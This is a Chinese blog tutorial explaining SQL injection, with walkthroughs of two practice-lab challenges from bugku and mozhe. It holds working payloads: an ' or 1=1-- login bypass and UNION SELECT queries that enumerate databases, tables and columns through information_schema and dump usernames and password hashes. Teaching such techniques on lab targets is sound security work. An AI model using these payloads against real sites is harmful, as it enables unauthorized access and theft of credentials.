简单介绍sql注入

博主： xiaolong
发布时间：2020 年 08 月 26 日
766 次浏览
暂无评论
4531字数
分类：技术

Sql就是数据库的结构化查询语言

Sql注入，就是将任意sql语句插入数据库进行查询，通过执行恶意SQL语句，从而得到想要的信息
原理就是通过输入的内容来修改sql语句，使之违背原计划的功能

比如一个登陆界面

在这里插入图片描述

他的sql语句为
Select * from admin where username=’a’ and password=’b’
我们在用户名那栏输入的内容为a，在密码那栏输入的内容为b，当我们输入正确用户名和密码时才会登陆
当我们在用户名那里输入’ or 1=1-- 时也能登陆成功，这时这句sql语句就变成了
Select * from admin where username=’’ or 1=1-- ’ and password=’b’
虽然username的内容为空，但是跟了个or语句，1=1永远成立，而后面又跟了个注释符号把后面的语句给注释掉了，那sql语句就可以理解为
Select * from admin where 1
所以能成功登陆

bugku上的一题

首先判断有无注入点

正常输入1时
在这里插入图片描述

当我们输入1’时，发现返回有问题
在这里插入图片描述

说明存在注入点
来看一条sql语句
Select * from flag where id=’1’
我们输入的内容就是id后面的这个1，但当我们输入1’时就变成了id=’1’’多了一个单引号,所以会报错
那我们怎么让他正确呢，输入1’-- （注意--后面有1个空格，这表示注释，也可以用#）
在这里插入图片描述

接下来我们就要判断究竟有几个字段（就是这个表有几列）

先来了解一下order by 语句
在这里插入图片描述
如果order by 后面跟的是数字，如order by 1意思就是按第1列排序
所以我们就可以通过order by来判断字段数

输入1’ order by 1-- 回显正常，2,3,4,时都正常，当到5时发现报错，说明一共就4个字段

接下来我们要查询这个数据库的一些信息

这里要用到union（联合查询）
来看两条联合查询语句
select * from users where id=1 union select id,username,password from users where id=2
在这里插入图片描述 select * from users where id=1 union select 1,2,3

然后我们输入-1’ union select 1,2,3,4-- （注意这里id必须为不存在的数值）
在这里插入图片描述
接着输入
-1' union select 1,2,3,concat_ws('~',database(),user(),version())--

Database()为当前数据库名字，uesr()为当前用户，version()为版本
可以看到数据库名为skctf_flag

那接下来就是从数据库中获取表名

information_schema.schemata包含所有数据库的名
information_schema.tables包含所有库的表名
information_schema.columns包含所有表的字段
table_schema 数据库名称
table_name 表名
column_name 列名
schema_name 数据库名

在这里插入图片描述
输入
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'--

可以发现有两张表，flag肯定是在fl4g里

那接下来就是从表中获取列名

输入
-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=’ fl4g’--
在这里插入图片描述

最后知道列名后直接查询

输入
-1' union select 1,2,3,group_concat(skctf_flag) from fl4g--
在这里插入图片描述

墨者学院里的sql注入
https://www.mozhe.cn/bug/detail/82

先判断注入点

在这里插入图片描述
看到有个通知点进去，有个id=1，猜测是注入点

输个'进去

报错了，看来确实是注入点

开始判断字段数

在这里插入图片描述
1,2,3,4一个个试，到5时报错，说明只有4个字段

接着开始查库名

在这里插入图片描述这里给大家看看这里两种查库名的区别

第1种

id=2 union select 1,2,database(),4
在这里插入图片描述

第2种

id=2 union select 1,2,group_concat(schema_name) ,4 from information_schema.schemata
在这里插入图片描述
可以看到有好几个库名，先来看mozhe_Discuz_StormGroup

接着查表名

id=2 union select 1,2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
在这里插入图片描述
查到两个表名

接着查列名

id=2 union select 1,2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'
在这里插入图片描述
有name和password,只剩最后一步了

查name和password里的内容

id=2 union select 1,2,group_concat(name,password) ,4 from StormGroup_member
在这里插入图片描述
查询到了两个密码，md5解密后发现第1个密码不对，第2个才是正确密码

所以账号就是mozhe,密码为292411
登入成功
在这里插入图片描述

最后修改：2023 年 12 月 15 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

爱情塔罗
事不关己，高高挂起，这种处事原则，未必是错的！
jack
加个友链吗？
QAQ
师傅现在不做技术这方面了吗
jack
师傅是做什么工作的啊？
无名博客
好的，麻烦等我缓存更新

简单介绍sql注入

xiaolong • 2020 年 08 月 26 日

<p><strong>Sql就是数据库的结构化查询语言</strong></p><p><em>Sql注入，就是将任意sql语句插入数据库进行查询，通过执行恶意SQL语句，从而得到想要的信息</em><br><em>原理就是通过输入的内容来修改sql语句，使之违背原计划的功能</em></p><p>比如一个登陆界面</p><p><img src="https://qiuniu.xiaolong22333.top/20200719142404415.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>他的sql语句为<br><code>Select * from admin where username=’a’ and password=’b’</code><br>我们在用户名那栏输入的内容为a，在密码那栏输入的内容为b，当我们输入正确用户名和密码时才会登陆<br>当我们在用户名那里输入’ or 1=1--   时也能登陆成功，这时这句sql语句就变成了<br><code>Select * from admin where username=’’ or 1=1-- ’ and password=’b’</code><br>虽然username的内容为空，但是跟了个or语句，1=1永远成立，而后面又跟了个注释符号把后面的语句给注释掉了，那sql语句就可以理解为<br><code>Select * from admin where 1</code><br>所以能成功登陆</p><hr><p>bugku上的一题</p><h5>首先判断有无注入点</h5><p>正常输入1时<br><img src="https://qiuniu.xiaolong22333.top/202007191427374.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>当我们输入1’时，发现返回有问题<br><img src="https://qiuniu.xiaolong22333.top/20200719142800305.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>说明存在注入点<br>来看一条sql语句<br><code>Select * from flag where id=’1’</code><br>我们输入的内容就是id后面的这个1，但当我们输入1’时就变成了id=’1’’多了一个单引号,所以会报错<br>那我们怎么让他正确呢，输入1’--    （注意--后面有1个空格，这表示注释，也可以用#）<br><img src="https://qiuniu.xiaolong22333.top/20200719143226213.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><h5>接下来我们就要判断究竟有几个字段（就是这个表有几列）</h5><p>先来了解一下order by 语句<br><img src="https://qiuniu.xiaolong22333.top/20200719143245629.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>如果order by 后面跟的是数字，如order by 1意思就是按第1列排序<br>所以我们就可以通过order by来判断字段数</p><p>输入1’ order by 1--   回显正常，2,3,4,时都正常，当到5时发现报错，说明一共就4个字段</p><h5>接下来我们要查询这个数据库的一些信息</h5><p>这里要用到union（联合查询）<br>来看两条联合查询语句<br><code>select * from users where id=1 union select id,username,password from users where id=2</code><br><img src="https://qiuniu.xiaolong22333.top/20200720100049116.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><code>select * from users where id=1 union select 1,2,3</code><br><img src="https://qiuniu.xiaolong22333.top/20200720100131612.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>然后我们输入-1’ union select 1,2,3,4--       （注意这里id必须为不存在的数值）<br><img src="https://qiuniu.xiaolong22333.top/20200719143905409.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>接着输入<br><code>-1' union select 1,2,3,concat_ws('~',database(),user(),version())--     </code><br><img src="https://qiuniu.xiaolong22333.top/2020071914395796.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>Database()为当前数据库名字，uesr()为当前用户，version()为版本<br>可以看到数据库名为skctf_flag</p><h5>那接下来就是从数据库中获取表名</h5><hr><p>information_schema.schemata包含所有数据库的名<br>information_schema.tables包含所有库的表名<br>information_schema.columns包含所有表的字段<br>table_schema 数据库名称<br>table_name 表名<br>column_name 列名<br>schema_name 数据库名</p><hr><p><img src="https://qiuniu.xiaolong22333.top/20200719144050470.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>输入<br><code> -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'--    </code><br><img src="https://qiuniu.xiaolong22333.top/20200719144231972.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>可以发现有两张表，flag肯定是在fl4g里</p><h5>那接下来就是从表中获取列名</h5><p>输入 <br><code>-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=’ fl4g’--   </code><br><img src="https://qiuniu.xiaolong22333.top/20200719144448960.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><h5>最后知道列名后直接查询</h5><p>输入<br><code>-1' union select 1,2,3,group_concat(skctf_flag) from fl4g--  </code><br><img src="https://qiuniu.xiaolong22333.top/20200719144740386.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><hr><p>墨者学院里的sql注入<br><span class="external-link"><a class="no-external-link" href="https://www.mozhe.cn/bug/detail/82" target="_blank"><i data-feather="external-link"></i>https://www.mozhe.cn/bug/detail/82</a></span></p><h5>先判断注入点</h5><p><img src="https://qiuniu.xiaolong22333.top/20200719153933943.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>看到有个通知点进去，有个id=1，猜测是注入点<br><img src="https://qiuniu.xiaolong22333.top/20200719160128505.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>输个'进去<br><img src="https://qiuniu.xiaolong22333.top/20200719160246264.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>报错了，看来确实是注入点</p><h5>开始判断字段数</h5><p><img src="https://qiuniu.xiaolong22333.top/20200719161158955.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>1,2,3,4一个个试，到5时报错，说明只有4个字段</p><h4>接着开始查库名</h4><p><img src="https://qiuniu.xiaolong22333.top/2020071916214943.png" alt="在这里插入图片描述" title="在这里插入图片描述" style="">这里给大家看看这里两种查库名的区别</p><h3>第1种</h3><p><code>id=2 union select 1,2,database(),4</code><br><img src="https://qiuniu.xiaolong22333.top/20200719162523832.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><h3>第2种</h3><p><code>id=2 union select 1,2,group_concat(schema_name) ,4 from information_schema.schemata</code><br><img src="https://qiuniu.xiaolong22333.top/20200719162259536.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>可以看到有好几个库名，先来看mozhe_Discuz_StormGroup</p><h5>接着查表名</h5><p><code>id=2 union select 1,2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'</code><br><img src="https://qiuniu.xiaolong22333.top/20200719163221227.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>查到两个表名</p><h5>接着查列名</h5><p><code>id=2 union select 1,2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'</code><br><img src="https://qiuniu.xiaolong22333.top/20200719163835370.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>有name和password,只剩最后一步了</p><h5>查name和password里的内容</h5><p><code>id=2 union select 1,2,group_concat(name,password) ,4 from StormGroup_member</code><br><img src="https://qiuniu.xiaolong22333.top/20200719164359562.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""><br>查询到了两个密码，md5解密后发现第1个密码不对，第2个才是正确密码<br><img src="https://qiuniu.xiaolong22333.top/20200719164901622.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p><p>所以账号就是mozhe,密码为292411<br>登入成功<br><img src="https://qiuniu.xiaolong22333.top/20200719165011930.png" alt="在这里插入图片描述" title="在这里插入图片描述" style=""></p>

简单介绍sql注入

首先判断有无注入点

接下来我们就要判断究竟有几个字段（就是这个表有几列）

接下来我们要查询这个数据库的一些信息

那接下来就是从数据库中获取表名

那接下来就是从表中获取列名

最后知道列名后直接查询

先判断注入点

开始判断字段数

接着开始查库名

第1种

第2种

接着查表名

接着查列名

查name和password里的内容

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

BUUCTF刷题记录(持续更新中~)（更新：断更了~~）

这里是文章目录

CTF中非主流PHP文件包含

常见的文件头识别和修复

php死亡exit()绕过

伪随机数问题总结

ctfshow web入门命令执行(部分记录)

子域名接管漏洞

tp6.0.x反序列化漏洞

糟糕的周六

简单介绍sql注入

首先判断有无注入点

接下来我们就要判断究竟有几个字段（就是这个表有几列）

接下来我们要查询这个数据库的一些信息

那接下来就是从数据库中获取表名

那接下来就是从表中获取列名

最后知道列名后直接查询

先判断注入点

开始判断字段数

接着开始查库名

第1种

第2种

接着查表名

接着查列名

查name和password里的内容

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

简单介绍sql注入

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款